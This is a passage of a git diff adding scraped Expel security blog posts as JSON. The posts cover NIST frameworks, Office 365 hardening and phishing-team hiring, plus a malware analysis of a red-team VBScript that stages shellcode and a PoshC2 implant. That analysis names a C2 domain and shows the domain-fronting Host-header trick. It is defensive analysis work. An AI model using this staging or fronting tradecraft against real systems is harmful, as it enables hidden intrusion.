encourage you to download your copy today and spend a few minutes with it (it\u2019s actually briefer than you might expect, and also includes a football analogy you might appreciate). If you have comments or questions, please drop us a line ." +} \ No newline at end of file diff --git a/nist-csf-a-new-interactive-tool-to-track-your-progress.json b/nist-csf-a-new-interactive-tool-to-track-your-progress.json new file mode 100644 index 0000000000000000000000000000000000000000..56ca827ca480e25aa74b2ade8031bc6431699e86 --- /dev/null +++ b/nist-csf-a-new-interactive-tool-to-track-your-progress.json @@ -0,0 +1,6 @@ +{ + "title": "NIST CSF: A new interactive tool to track your progress", + "url": "https://expel.com/blog/nist-csf-new-interactive-tool-track-progress/", + "date": "Mar 3, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG NIST CSF: A new interactive tool to track your progress Security operations \u00b7 2 MIN READ \u00b7 BRUCE POTTER \u00b7 MAR 3, 2020 \u00b7 TAGS: CISO / Framework / How to / NIST / Planning If you\u2019ve ever checked out Expel on LinkedIn or Twitter , or you\u2019ve ever read one of our blog posts, then you know we\u2019re big fans of the NIST Cybersecurity Framework (CSF) . Why we like the NIST CSF There\u2019s a lot to like about the NIST CSF: A regulatory-agnostic framework like the CSF helps drive more mature security programs. With the CSF, companies can easily and consistently assess where they are today and where they want to be from a cybersecurity standpoint. It\u2019s a great way to democratize security and bring risk management to the masses. We like that it demystifies a complex subject and allows less technical orgs to transact on security in a meaningful way. It helps orgs of all shapes and sizes measure and report on their respective security programs. This might be our favorite thing about the NIST CSF \u2014 the framework gives security professionals, regardless of the organization they\u2019re in, a standardized way to measure and talk about their security maturity, and the progress they\u2019re making on those efforts. Whether you\u2019re making the case for additional security budget or presenting to your board of directors, the NIST CSF gives you a tangible and effective way to do that. Making the NIST CSF into something actionable for your org While there are lots of positives about the NIST CSF, we get that putting it into practice is sometimes easier said than done. How exactly do you take a framework and implement it, let alone track how you\u2019re doing? We heard you. And that\u2019s why we created our NIST CSF self-scoring tool a few years ago, which you can download right here . Now available: the NIST CSF dashboard in Expel Workbench\u2122 If you\u2019re an Expel customer, we\u2019ve got an even better way for you to take advantage of our NIST CSF self-scoring tool. We just introduced an interactive version of our NIST CSF self-scoring tool right in Expel Workbench\u2122. Now it\u2019s even easier to use the CSF, measure your progress and report on it \u2026 all of which is done through the same interface you use every day to manage your org\u2019s security. Take a look: Here\u2019s the NIST CSF Dashboard for Expel Workbench\u2122, available right in the same interface you use to to keep tabs on your org\u2019s security. Here\u2019s a closer look at the dashboard and the self-scoring mechanisms. See it for yourself Here at Expel we use the NIST CSF self-scoring tool to measure our own progress when it comes to security, and lots of our customers use it too. They\u2019ve told us the tool is easy to use, effective and helps them measure and track their security programs. Want to check out Expel Workbench\u2122 and see how it can help you streamline your security operations? Give us a shout \u2014 we\u2019d love to talk." +} \ No newline at end of file diff --git a/nist-s-new-framework-riding-the-wave-of-re-imagining.json b/nist-s-new-framework-riding-the-wave-of-re-imagining.json new file mode 100644 index 0000000000000000000000000000000000000000..ead422366ee0f7003e9e15332869081de7675752 --- /dev/null +++ b/nist-s-new-framework-riding-the-wave-of-re-imagining.json @@ -0,0 +1,6 @@ +{ + "title": "NIST's new framework: Riding the wave of re-imagining ...", + "url": "https://expel.com/blog/nist-new-framework-riding-wave-reimagining-privacy/", + "date": "May 21, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG NIST\u2019s new framework: Riding the wave of re-imagining privacy Security operations \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 MAY 21, 2019 \u00b7 TAGS: CISO / Managed security / NIST / Planning Let me set the scene for you: Everyone is stumbling around in the dark, trying to figure out what the heck \u201cprivacy\u201d really means and what they should do about it. Right now, we\u2019re living in a gray, soulless world of privacy compliance \u2026 which doesn\u2019t involve much independent thought or risk-based decision making. All of a sudden, our hero \u2014 the National Institute of Standards and Technology (NIST) \u2014 rides in with its Privacy Framework. And all is right in the world again. The sun is shining, birds are singing and the flowers are blooming. Oh, and all the characters in this story are now off and running to develop their own meaningful and fulfilling privacy risk management program. End scene and cue the happy music. Sure, this movie might not ever make it to the big screen, but for security nerds like us the development of NIST\u2019s forthcoming Privacy Framework is pretty award-worthy. It\u2019s going to revolutionize how most of us think about privacy. What\u2019s the NIST Privacy Framework solving for? Many companies are only starting to come to grips with privacy thanks to new privacy regimes like the EU\u2019s GDPR and California\u2019s CCPA. And when you come to grips with a regulation, it typically looks a lot like compliance. \u201cWhat boxes do I need to check in order to be compliant?\u201d you might ask yourself. And once you\u2019re compliant, you\u2019re Good Enough\u2122 and you move onto the next problem. While taking a compliance-driven approach might feel like the equivalent of hitting an \u201ceasy\u201d button, there\u2019s one big problem: It leaves gaps in your org\u2019s privacy posture that you\u2019re probably not even aware of. The \u201ccompliance = security\u201d mindset has been a problem for years, and industry analysts and journalists love reminding us after every breach that simply being compliant isn\u2019t enough. Turns out that privacy is no different. Enter NIST and its forthcoming Privacy Framework. You\u2019ve probably heard of NIST\u2019s Cyber Security Framework (CSF) \u2014 it was developed a few years ago in response to an Executive Order issued by former President Obama. Many organizations use the CSF to get their security house in order; it\u2019s an open document, it\u2019s comprehensive, it\u2019s approachable and companies of all shapes and sizes can use it. NIST recognized that privacy is a domain that needs a similar framework to help guide orgs big and small to better outcomes. So they\u2019ve taken it upon themselves to create a Privacy Framework modeled after the CSF. And when I say \u201cmodeled,\u201d I mean both in process and in form. The original CSF was constructed through a series of workshops held around the country where NIST solicited feedback on various work products and refined the CSF with the public\u2019s involvement until we landed where we are today. They\u2019re using the exact same process with the Privacy Framework. A draft document was released earlier in May and I just returned from Atlanta where they held their workshop to discuss the draft. The next workshop is happening in July in Boise, with more interim products and documents likely to be released in the coming months. In form, the draft document looks very similar to the CSF. There are five core functional areas, and each functional area is broken down into categories and sub-categories. Three of the five CSF core functional areas \u2014 \u201cIdentify,\u201d \u201cProtect\u201d and \u201cResponse\u201d \u2014 are the same as the CSF, but in the Privacy Framework they\u2019ve rounded out the list by adding \u201cControl\u201d and \u201cInform.\u201d When you read the sub-categories, you\u2019ll see that many were lifted directly from the CSF and the word \u201csecurity\u201d replaced with \u201cprivacy.\u201d This is an overt recognition that security is an integral part of privacy and vice versa. These two frameworks will be intertwined in their structure and their execution within organizations. How orgs will use the NIST Privacy Framework This new effort from NIST is a comprehensive framework that anyone can use to build a true privacy risk program, not just a compliance program. This means you can use the Privacy Framework to take a holistic approach to privacy instead of playing whack-a-mole with various controls in different regimes. And the integration with the CSF opens the door to bringing together a diverse group of stakeholders in your org to participate in strategizing about both security and privacy. Lawyers, data scientists, security professionals, privacy engineers, social scientists and executives will need to (and should) come together to address privacy at an organizational level. This Privacy Framework represents the democratization of privacy in the same way that the CSF brought security risk management to the masses. It demystifies a complex subject and allows smaller, less technical organizations to transact on privacy in a meaningful way. As a result, I believe we\u2019re going to see a wave of privacy risk management programs created throughout private industry. These programs will be tightly tied to cybersecurity activities but will have a focus on privacy and include a wider group of stakeholders in the development process. Organizations will be able to better protect an individual\u2019s privacy (w00t!) and continue to comply with various regulatory and industry requirements. The bottom line The Privacy Framework is still a work in progress \u2014 and as it stands isn\u2019t perfect. There was lots of constructive feedback shared at the Atlanta workshop and I\u2019m sure there will continue to be. (By the way, if you\u2019ve looked at the draft and want to share comments, you can email your feedback to privacyframework@nist.gov ). NIST will continue to refine the Privacy Framework and their goal is to have a final draft published by the end of 2019. I\u2019m optimistic that the final version of the Privacy Framework will be well harmonized with the CSF and allow organizations to rapidly adopt it as part of a broad and comprehensive privacy risk program. That will be the moment when privacy is re-imagined. The transformation of privacy from compliance to risk in a way that is attainable by organizations both big and small will be a big win not just for those orgs but also for all citizens. Cue the applause and roll the credits." +} \ No newline at end of file diff --git a/not-the-jedi-trials-but-our-free-trial-could-help-bring.json b/not-the-jedi-trials-but-our-free-trial-could-help-bring.json new file mode 100644 index 0000000000000000000000000000000000000000..f081e61f98df6efdbcd739f80467c12b20028a92 --- /dev/null +++ b/not-the-jedi-trials-but-our-free-trial-could-help-bring.json @@ -0,0 +1,6 @@ +{ + "title": "Not the Jedi trials, but our free trial could help bring ...", + "url": "https://expel.com/blog/not-the-jedi-trials-but-our-free-trial-could-help-bring-balance-to-the-force/", + "date": "May 4, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Not the Jedi trials, but our free trial could help bring balance to the Force Security operations \u00b7 1 MIN READ \u00b7 JAMES JURAN \u00b7 MAY 4, 2023 \u00b7 TAGS: Cloud security / MDR You didn\u2019t think we\u2019d let May the Fourth go by without a Star Wars -themed post, did you? In the Star Wars canon, Jedi Padawan needed to complete five trials to achieve Knighthood. Thankfully, we only have one trial, and it\u2019s free. Better, it doesn\u2019t involve intense physical pain, or worse, deep self-discovery. Instead, this trial is all about testing out Expel MDR (managed detection and response) for Cloud Infrastructure. How does it work? Sign up here , and you\u2019ll get 14 days of full access to our security operations platform, Expel Workbench \u2122, to check out our MDR for Cloud Infrastructure product. You connect your tech, conduct an incident simulation (we\u2019ll walk you through how), and we\u2019ll send you the findings of that alert. And if Expel actually does detect an Imperial battlecruiser (legitimate threat) in the Outer Rim (your cloud environment) during the trial period, our Jedi Council (security operations center) will have you covered, and will support your cloud environment, like it would for any customer, throughout the trial period. Once your trial is up, we\u2019ll freeze your account in carbonite and won\u2019t ingest any more data from your connected tech. Then we\u2019ll delete your account and data altogether after another 14 days. We don\u2019t store or keep any of your data after the 14-day frozen period expires. When it comes to the cloud, we know staying on top of multiple computing environments, databases, policies, and best practices can be complex, time consuming, and burdensome for your team. These concerns could be holding you back from moving to the cloud or scaling your cloud environment. Perhaps you don\u2019t have enough visibility, are having trouble dealing with cloud security alerts, or simply don\u2019t have consistent security coverage across your different cloud environments. Our goal with this free trial is to show you how we can help you up your cloud security game. So why not test out how Expel Workbench works in your environment? Setting it up is easier than\u2014constructing your own lightsaber, and might just help bring balance to your own little corner of the Force." +} \ No newline at end of file diff --git a/obfuscation-reflective-injection-and-domain-fronting-oh-my.json b/obfuscation-reflective-injection-and-domain-fronting-oh-my.json new file mode 100644 index 0000000000000000000000000000000000000000..b91dfb0fec5a90549785a4e56a0ae7df3f1cd7ac --- /dev/null +++ b/obfuscation-reflective-injection-and-domain-fronting-oh-my.json @@ -0,0 +1,6 @@ +{ + "title": "Obfuscation, reflective injection and domain fronting; oh my!", + "url": "https://expel.com/blog/obfuscation-reflective-injection-domain-fronting/", + "date": "May 26, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Obfuscation, reflective injection and domain fronting; oh my! Security operations \u00b7 9 MIN READ \u00b7 BRITTON MANAHAN \u00b7 MAY 26, 2020 \u00b7 TAGS: Get technical / Managed detection and response / Security Incident / SOC / Vulnerability We detect and respond to a lot of red team activity at Expel. Each engagement is a great opportunity for our SOC analysts to gain additional experience responding to an attacker (albeit a simulated one). Red team engagements help any security team stay ahead in a world with continuously evolving attacker tradecraft. When going head-to-head with a red team, we encounter a broad range of attacks. During a recent red team simulation we detected and responded to the execution of a suspicious VBscript file. Acquiring malicious files gives us the opportunity to extract deeper details that can be invaluable. In this post I\u2019ll walk you through our initial detection and then show you how we: Determined the logic implemented by the VBscript and its payload Extracted key details of the payload via base64dump.py and pecheck.py Decompiled the payload with JetBrains DotPeek Followed the chain of obfuscation to reach the red team PoshC2 implant Analyzed the red team implant for attacker IOCs Then I\u2019ll share the details of the capabilities the file contained as well as the insights we gathered coming out of this exercise. Spotting something suspicious: malware detection Malware analysis is \u201clike a box of chocolates,\u201d in that you never know what you\u2019re going to encounter as you inspect the details of malicious code. During this red team engagement with an Expel customer, the CrowdStrike EDR Platform alerted on the execution of a suspicious VBScript file. Expel Workbench Alert Details 1 Expel Workbench Alert Details 2 So, we dove in to take a deeper look. CrowdStrike Detection Details For this CrowdStrike alert, a VBScript file named settings.vbs was launched with the command-line version of the Windows Script Host, cscript.exe. CrowdStrike Overwatch observed that the cscript.exe process reflectively injected a library named SharpDLL.dll. Reflective injection inserts an executable library file into the address space of a process from memory instead of from on disk. This method doesn\u2019t rely on the LoadLibrary Windows API call, which only works with libraries files located on disk. The Expel Global Response team, which provides Expel with advanced IR capabilities during critical incidents, noticed two additional recorded activities for the cscript.exe process: Several .NET Framework Libraries (examples below) were loaded A DNS request for paypal.com (this will be explored more later on) CrowdStrike Detection Disk Operations CrowdStrike Detection DNS Request These recorded activities were extremely suspicious and signaled to us that it was time to conduct an investigation. That\u2019s when I began my analysis. Analyzing the file in three phases When I looked at the contents of the settings.vbs file, I noticed it began with following comment block: Beginning of settings.vbs None of the script functionality contained in the rest of the settings.vbs file relates to this comment block, which is part of its attempt to achieve a surface appearance of performing printer and network administrative activities. When looking at the first section of code executed by the script, note that the first steps taken determine which version of .NET the process executing the script should configure itself to load in. settings.vbs .NET Version Selection If present in a process when the .NET framework is loaded, the COMPLUS_Version environment variable will force a certain version of the .NET framework to be loaded. Based on the presence of a particular 4.0 version of the .NET framework, determined by checking for the existence of a Windows Registry key, the script will set this environment variable to either v4.0.30319 or v2.0.50727. The next action taken by the script is the initialization of two large base64 encoded strings, wpad_1 and wpad_2. settings.vbs Base64 Strings Both of these strings are passed through the ProxySettingConfiguration function, which decodes a provided base64 string. This function was the first strong evidence that the script was generated using the DotNetToJScript tool. DotNetToJScript is described as \u201ca tool to create a JScript file which loads a .NET v2 assembly from memory\u201d created by James Forshaw. This function is almost exactly the same as the Base64ToStream function in the vbs_template.txt file in the DotNetToJScript project source code. DotNetToJScript Base64 Decode Function settings.vbs Base64 Decode Function The decoded base64 strings are then deserialized using the deserialize_2 function. Serialization is \u201cthe process of converting an object into a stream of bytes to store the object or transmit it to memory, a database, or a file\u201d according to Microsoft C# Programming Documentation . Deserialize, the reverse of this process, returns the byte stream into its original form. settings.vbs Decode and Deserialize Strings After undergoing the decoding and deserialize process, the wpad_1 variable becomes the following: wpad_1 Contents As part of the .NET deserialize process, the script host process will attempt to load the 3.0.0.0 version of the Microsoft.PowerShell.Editor (The PowerShell ISE). This is likely some type of check on the current system the script is executing on, supported by the error check that happens immediately after in the code ( If Err.Number <> 0 ). Powershell ISE Check Failing on Fresh Windows 10 VM If this check passes, the code then moves onto its main finale of decoding and deserializing the larger base64 string in the wpad_2 variable. Seeing that there was an MZ header present in the second base64 string, and evidence of DotNetToJScript being used, I used a collection of Python scripts from Didier Stevens to continue my analysis in three phases. Phase 1: Settings.vbs \u2192 uqatarcu.dll: The base64dump.py and pecheck.py Python scripts by Didier Stevens make the process of locating a Windows portable executable (\u201cPE\u201d) file inside a base64 string much easier. After extracting the base64 string for the wpad_2 variable in settings.vbs into a text file, this script is used to expedite its analysis. Running the following command using the two scripts will: Decode the base64 string in wpad_2.txt while ignoring any whitespace or double quotes in the string Search for the first occurrence of the MZ Windows PE file signature Pass the decoded results starting at the search hit to pecheck.py to validate and parse the PE header Output the extracted information from the PE header base64dump.py [options] [file] Options used in blog post -w, --ignorewhitespace ignore whitespace -i IGNORE, --ignore=IGNORE characters to ignore -s SELECT, --select=SELECT select item nr for dumping (a for all) -c CUT, --cut=CUT cut data -d, --dump perform dump base64dump.py -w -I 22 -s 1 -c \"['MZ']:\" -d wpad_2.txt | pecheck.py The resulting verified PE file includes the following information: uqatarcu.dll PE File Information uqatarcu.dll Hashes and Overlay Details Then with the overlay offset known (extra bytes at the end of the parsed PE file), the following command will write out the first dll, uqatarcu.dll, with the extra overlay removed. base64dump.py -w -I 22 -s 1 -c \"['MZ']:0xb9c00l\" -d wpad_2.txt > uqatarcu.dll Phase 2: uqatarcu.dll \u2192 Microsoft.dll and enclosed base64: The beautiful thing about C#.NET malware analysis, being an interpreted language instead of a compiled programming language, is that binary files can be automatically decompiled back into their original source code. JetBrains DotPeek is a program that will automatically do this decompilation for you. Opening up uqatarcu.dll in JetBrains DotPeek shows that it imports the classic 3 function combo for loading shellcode: VirtualAlloc, VirtualProtect and CreateThread. uqatarcu.dl Windows API imports Along with two more base64 strings, s1 and s2. uqatarcu.dll s1 and s2 The s1 string contains base64 encoded 32-bit shellcode and s2 contains 64-bit shellcode. The DLL examines the byte size of a pointer to determine the correct architecture to use, and will deploy the result to a dynamically allocated section of memory. After updating the allocated memory permissions to PAGE_EXECUTE_READWRITE, CreateThread is called with the beginning of this memory block (IntPtr num) as its starting address. uqatarcu.dll 32 or 64-bit uqatarcu.dll Deploy Shellcode Proceeding with the 64-bit version of the next stage for analysis, the contents of the s1 string, there are four hits this time for MZ in the decoded base64 string. However, only the final MZ hit is fully validated by pecheck.py. The cut parameter base64dump.py makes it easy to specify after which search hit of MZ we want to start passing the decoded string to pecheck.py. The number placed after the search term ending bracket specifies this in the commands below: base64dump.py -w -I 22 -s 1 -c \"['MZ']1:\" -d b64_uqatarcu_s1.txt | pecheck.py uqatarcu.dll s1 First MZ Match base64dump.py -w -I 22 -s 1 -c \"['MZ']2:\" -d b64_uqatarcu_s1.txt | pecheck.py uqatarcu.dll s1 Second MZ Match base64dump.py -w -I 22 -s 1 -c \"['MZ']3:\" -d b64_uqatarcu_s1.txt | pecheck.py uqatarcu.dll s1 Third MZ Match base64dump.py -w -I 22 -s 1 -c \"['MZ']4:\" -d b64_uqatarcu_s1.txt | pecheck.py uqatarcu.dll s1 Forth MZ Match The cut data that was validated as a PE file by pecheck contains some interesting attributes for the file name and description: Microsoft.dll PE File Information This next DLL layer then can be extracted to disk with the following command: base64dump.py -w -I 22 -s 1 -c \"['MZ']4:\" -d b64_uqatarcu_s1.txt > Microsoft.dll This DLL is also a C#.NET binary, and loading it up in DotPeek reveals the following interesting code section: Microsoft.dll ShellCode Routine While this .NET source code makes it clear another base64 string is being decoded and executed, the location of it is not as straightforward. The binary does not contain any calls to the RunCS function as well as any base64 strings. Since a majority of the s1 string from uqatarcu.dll was bypassed as a result of the cut parameter \u201c[\u2018MZ\u2019]4:\u201d and the thread starting address was before the fourth MZ search hit, I decided to return to the s1 string to extract all available strings. base64dump.py -w -I 22 -s 1 -S b64_uqatarcu_s1.txt When scrolling through this output, the presence of an encapsulated base64 string visually stands out. uqatarcu.dll Encapsulated Base64 Phase 3: Encapsulated base64 \u2192 dropper_cs.exe: The base64 string found within the s1 string was successfully parsed by pecheck as a valid PE file. The PE header file information contains a very interesting filename. base64dump.py -w -I 22 -s 1 -c \"['MZ']:\" -d b64_from_b64_uqatarcu_s1.txt | pecheck.py dropper_cs PE File Information The binary can be further examined by generating a copy of it. base64dump.py -w -I 22 -s 1 -c \"['MZ']:\" -d b64_from_b64_uqatarcu_s1.txt > dropper_cs.exe \u201cdropper_cs.exe\u201d contains a number of notable strings including the domain seen being resolved during its runtime (paypal.com) and strong references to the PoshC2 implant: Parse_Beacon_Time ImplantCore update-crl.azureedge.net https://www.paypal.com:443 https://www.paypal.com:443/lt/?c setbeacon This final payload for this layered piece of malware is again written IN C#.NET. Loading it up in DotPeek provides a clear picture of command and control program functionality. dropper_cs Functions dropper_cs loadmodule dropper_cs download-file dropper_cs get-screenshotmulti dropper_cs listmodules Following the program logic reveals what is actually going on with the DNS resolution of paypal.com \u2013 domain fronting. Domain fronting leverages the way content delivery networks work in order to mask the true destination domain of an external network communication by operating at the application level. The DNS resolution and initial communication setup occurs for the high-reputation domain, while the host header \u2013 the true destination \u2013 is then set to the attacker controlled domain located on the same CDN. Domain Fronting Source: Domain Fronting in a nutshell by Rukavitsya The dropper_cs payload beacon was configured to appear to be communicating with paypal.com, which is set in the baseURL and address strings. After the initial DNS resolution, web requests for the beacon will actually end up being routed to update-crl.azureedge.net by setting this as the HTTP host header value with webClient.Headers.Add(\u201cHost\u201d,str) . dropper_cs Domain Fronting Related Code 1 dropper_cs Domain Fronting Related Code 2 Based on CDN reporting tools, https://www.paypal.com:443 would resolve to the Akamai CDN. While the azuredge.net subdomain is located on the Microsoft Azure infrastructure, Azure provides the option to select from a number of top CDNs, including Akamai. CDN Report for paypal.com The layers of obfuscation contained in settings.vbs were worked through in order to reveal its true nature. None of the PE files and shellcode encapsulated in the vbs file ever hit the hard-drive, but rather are reflectively loaded into the script host process memory. The end result of our analysis gives us the source of the beacon payload and the real c2 domain. Settings.vbs \u2013> uqatarcu.dll (32/64 bit branch) \u2013> SharpRunner.dll (other ShellCode in Memory Space) \u2013> dropper_cs.exe Insights from this malware examination Like I mentioned in the beginning of this post \u2013 it\u2019s important to come out of red team engagements having learned something new that can help our customers in real life. Here\u2019s what I learned after exercising my detective muscles and untangling malware code in this simulation: Malware analysis takes persistence to peel back the layers Reaching the core of a malicious payload can provide invaluable insight With the right CDN, domain fronting is still a viable option for malicious actors We\u2019re working on another blog post that explores a suspicious login case study, so stay tuned for our upcoming content. Until then, check out our other blog posts for more lessons learned from alert investigations. A note about domain fronting Domain fronting is dependent on having both a domain on the same CDN as the domain it\u2019s masking as, and the domain fronting technique being possible on the CDN. While Google and Amazon have shut down the ability to perform domain fronting on their CDN services, this technique still works on Azure and other platforms. Domain fronting is not only leveraged by hackers to help blend-in inside a company network, but also used by non-malicious internet users to bypass Internet censorship. There is an argument that keeping it available is essential for Internet Freedom ( Domain Fronting Is Critical to the Open Web ). Time will tell if domain fronting remains an option for those with malicious and non-malicious intentions, but companies worried about it being used by malicious actors to help hide in their networks aren\u2019t powerless to detect it. Domain fronting can be detected by comparing the host field of the HTTP header with the HTTPS SNI field of the web request. This process will require SSL inspection, which is the ability to view the encrypted HTTP data, or a next-gen firewall product that directly provides this detection." +} \ No newline at end of file diff --git a/office-365-security-best-practices-five-things-to-do-right.json b/office-365-security-best-practices-five-things-to-do-right.json new file mode 100644 index 0000000000000000000000000000000000000000..fc71f356dce8333a0fe660cc891844bd8c2e7ac3 --- /dev/null +++ b/office-365-security-best-practices-five-things-to-do-right.json @@ -0,0 +1,6 @@ +{ + "title": "Office 365 security best practices: five things to do right ...", + "url": "https://expel.com/blog/office-365-five-things-to-keep-attackers-out/", + "date": "Jan 15, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Office 365 security best practices: five things to do right now to keep attackers out Security operations \u00b7 3 MIN READ \u00b7 DAN WHALEN \u00b7 JAN 15, 2019 \u00b7 TAGS: Cloud security / How to / Selecting tech Figuring out what you should do to protect your SaaS infrastructure like Office 365 \u2014 especially if you\u2019re newer to cloud \u2014 can feel overwhelming. After all, your users over in sales, marketing or R&D probably aren\u2019t going to think twice about how strong their passwords are, or notice the cleverly disguised phishing scam that just landed in their inboxes. We get it. And you\u2019re not alone if you\u2019re kinda freaking out: According to the PhishLabs 2018 Phishing Trends and Intelligence Report , attacks targeting SaaS applications exploded last year, growing by more than 237 percent. SaaS-based applications: a cloudier view of your data Things like email, word processing and document sharing tools are ubiquitous. This makes them prime targets for attackers. Long gone are the days when IT ran their own email servers. Today, SaaS-based applications like Microsoft Office 365 offer lots of convenience and cost savings \u2014 but since they operate in the cloud , it also means your former front row seats to your data and infrastructure now come with a slightly obstructed view. While cloud providers like Amazon Web Services, Microsoft Azure and Google are responsible for securing their infrastructure, the bottom line is that your organization is still responsible for protecting your company\u2019s data \u2013 whether you\u2019ve only got one app in the cloud or you\u2019ve moved all of your apps and data up there. (Psst: If your cloud security strategy needs a tune-up, you won\u2019t want to miss this post .) No matter where you are in your cloud journey, if you run Office 365 here are five important things you can do right away to keep attackers (and wiley insider threats) at bay. What do I need to do to keep Office 365 secure? If you\u2019re running Microsoft Office 365, there are five Office 365 security best practices you\u2019ll want to check out right now to keep your org and your data safe: Enable audit logging . This is one of the most impactful things you can do when it comes to securing Office 365. Why? Office 365 audit logs record all activities across Office 365 apps. When an incident occurs, this makes it a lot easier to investigate because you\u2019ve got access to all the actions users took in Office 365, ranging from viewing and downloading documents to resetting passwords. Here\u2019s a full list of the actions that Office 365 audit logs record, and instructions for turning on audit logging . Use multi-factor authentication everywhere. Multi-factor authentication is a lot like building a fence around the perimeter of your house (or data, in this case) to deter bad actors. It shrinks your risk of falling victim to the most common attacks like simple phishing and password spraying. Phishing is still one of the top initial attack methods of choice . For instance, take a look at this example of a crafty phishing campaign that hid malicious URLs in SharePoint files. Implement controls to stop the most common things attackers and users do. Look for security controls that address issues like phishing prevention, malware scanning, user behavior analytics and DLP scanning. Depending on your organization, this could mean implementing native Office 365 security tools , or exploring third-party options. Tighten up your Office 365 policy configurations. Microsoft offers good advice on ways to better secure your data in Office 365. Based on the Office 365-related incidents the Expel team has investigated and resolved for our customers, we recommend that, at a minimum, you review your organization\u2019s conditional access policies, restrict or disable public SharePoint and OneDrive links and disable mailbox forwarding. Plan ahead for account compromises \u2014 they\u2019re inevitable. Not to be all \u201cdoom and gloom\u201d over here, but as anyone in security knows, it\u2019s always wise to prepare for the worst. Know that when an incident occurs, investigations are probably different than the good ol\u2019 days when you had your email server tucked away safely in your server room. For starters, there aren\u2019t any endpoints or network devices to review. Also absent are files, processes and network traffic \u2014 all of which helped us determine the scope and impact of an intrusion in the past. Instead, SaaS incident investigations rely heavily on audit logs (see best practice #1) that are user-centric because they can help us determine what\u2019s normal or abnormal for a particular user\u2019s account. What location does the user normally authenticate from, and what device does he or she normally use? What actions does he or she take after logging into the account? To answer these questions, you\u2019ll need to be familiar with Office 365 audit logs. Last but not least, keep our handy cheat sheet for managing your next security incident nearby (and give a copy to every team member!). Still have questions? Want to learn more about Office 365 security in the cloud? Get in touch \u2014 we\u2019d love to help." +} \ No newline at end of file diff --git a/our-approach-to-building-expel-s-phishing-team.json b/our-approach-to-building-expel-s-phishing-team.json new file mode 100644 index 0000000000000000000000000000000000000000..e5debf66df93aeb7c35aa2e85c2a8855ae2046ac --- /dev/null +++ b/our-approach-to-building-expel-s-phishing-team.json @@ -0,0 +1,6 @@ +{ + "title": "Our approach to building Expel's Phishing team", + "url": "https://expel.com/blog/our-approach-to-phishing-team/", + "date": "Nov 8, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG A new way to recruit: Our approach to building Expel\u2019s Phishing team Security operations \u00b7 8 MIN READ \u00b7 BEN BRIGIDA, RAY PUGH, DESHAWN LUU AND HIRANYA MIR \u00b7 NOV 8, 2021 \u00b7 TAGS: Careers / Phishing A lot of companies are experiencing a brain drain in what\u2019s being called the Great Resignation. It\u2019s a pain that security teams know all too well. You hire great people who have the skills you need, they get familiar with your environment, and then\u2026they\u2019ve already moved on to their next job. You\u2019re happy for them. But now you\u2019re back to the beginning. Is there a solution? We\u2019ve written blog posts about how optimizing the human moment helps us not only create greater efficiencies in our operations, but also helps us prevent analyst burnout while giving them meaningful work. Optimizing for the human moment here at Expel means letting tech handle the work that can be automated \u2014 think decision support, enrichment and automation of repetitive tasks that increase cognitive load (i.e. the things that cause analyst burnout) \u2014 so our crew has the time and space to shine in the moments when a human eye is required. Fun fact: the initial beta of Expel\u2019s phishing service was built in a Jupyter notebook written by one of our security operations center (SOC) analysts. He\u2019s now one of our detection and response (D&R) engineers. Creating space for people to do what they love is at the core of why we do what we do. We do it for our customers and it\u2019s important to us that we also do it for our Expletives. So we asked ourselves: how do we build a service and training program that\u2019s accessible to folks early on in their security career journey? We discovered that part of the answer is in widening the pool for recruitment by focusing on traits, not skills. Allow us to explain. The Expel Phishing team is one of our newest teams, and recruiting for that team created an opportunity for us to experiment with this approach. So we set out to hire for the traits that are important for these roles (curiosity, candor, passion for learning, desire to help others, drive and attention to detail), knowing we could then teach our new team members the skills they need to be successful. In this blog post, we\u2019ll share how we\u2019re using the Expel Phishing team and its simple, narrow focus, to achieve two goals: Protect managed detection and response (MDR) service continuity Increase diversity in cybersecurity At the end of this post, you\u2019ll also hear from some of our newest Expel Phishing team recruits. They\u2019ll share their stories and what it\u2019s like to be a new member of the team. The Expel Phishing team Phishing is still the top threat facing most orgs. In fact, business email compromise (BEC) attacks made up 61 percent of the critical incidents Expel\u2019s security operations center (SOC) responded to in September. Knowing that phishing isn\u2019t only going to remain a top threat but that tactics will also continue to evolve, the Expel Phishing team was created in partnership with our customers. They had a need and we knew how to help. The initial team was a temporary experiment. After finding success during the research and development phase, we decided to pull in some of our other customers to beta test the service and see if we could run it on a larger scale. The beta test was a success and we introduced Expel\u2019s managed phishing service. The Expel Phishing team functions as a cost-effective bench for our managed detection and response (MDR) service. We expect a lot of our MDR analysts \u2014 providing world-class service against every bad actor on the internet on a staggering number of technologies and attack surface areas, in a transparent platform, while also communicating the findings directly to our customers in Slack. No pressure, right? We\u2019ve got their backs, just like we\u2019ve got our customers\u2019 backs. Protecting MDR service continuity Finding people who can provide that kind of MDR service on even one of our service offerings is difficult at an entry-level position. This means we have to spend time teaching our analysts what attackers do on roughly everything and how to use the Expel Workbench\u2122 to update customers about our work in real-time. It\u2019s a lot to learn, and it takes a while. On the other hand, because phishing has a much narrower scope, phishing analysts can focus on learning to find attackers in one threat vector (emails) and how to use the Expel Workbench to do so. Then they can communicate their findings to our customers. Through this learning process, they\u2019re also interwoven into the MDR service (think our SOC\u2019s always-open Zoom room, chats and meetings) so they see the MDR operational tempo and texture. As a result, phishing analysts focus on emails but also get exposure to more attack surfaces over time. So when there is an opening on the MDR team, phishing analysts can slot in and rapidly provide value because they\u2019ve effectively been in MDR training for their whole time on the phishing team. Because of these dual levels of exposure, we can draw out the learning timeline and have a lower technical threshold for recruiting phishing analysts because we can teach them how to do security at the MDR level while they initially provide value to phishing customers. As a result, we\u2019ve found that analysts who transition to the MDR service from the phishing team have a significantly greater familiarity with our customers, internal processes and the investigative methodology/analyst mindset we use \u2014 which they can put to use right away. Our phishing to MDR pipeline enables analysts to join our SOC even if they\u2019re new to the industry, gives them space to build additional skills and experience and our customers benefit from having them stay here as they continue to grow and have a clear path for career progression. Increasing diversity in cybersecurity This brings us to our second goal: increasing diversity in security. There are plenty of high-performing people looking to get into security. And a complex service offering has traditionally required either hiring people who have extensive experience in the field so they can perform the job now, or a lengthy onboarding period where a less experienced analyst is learning and having to produce under high expectations and pressure. Not only does this make it difficult to hire \u2014 it\u2018s one of the many driving forces behind the lack of diversity in our field. The barriers to 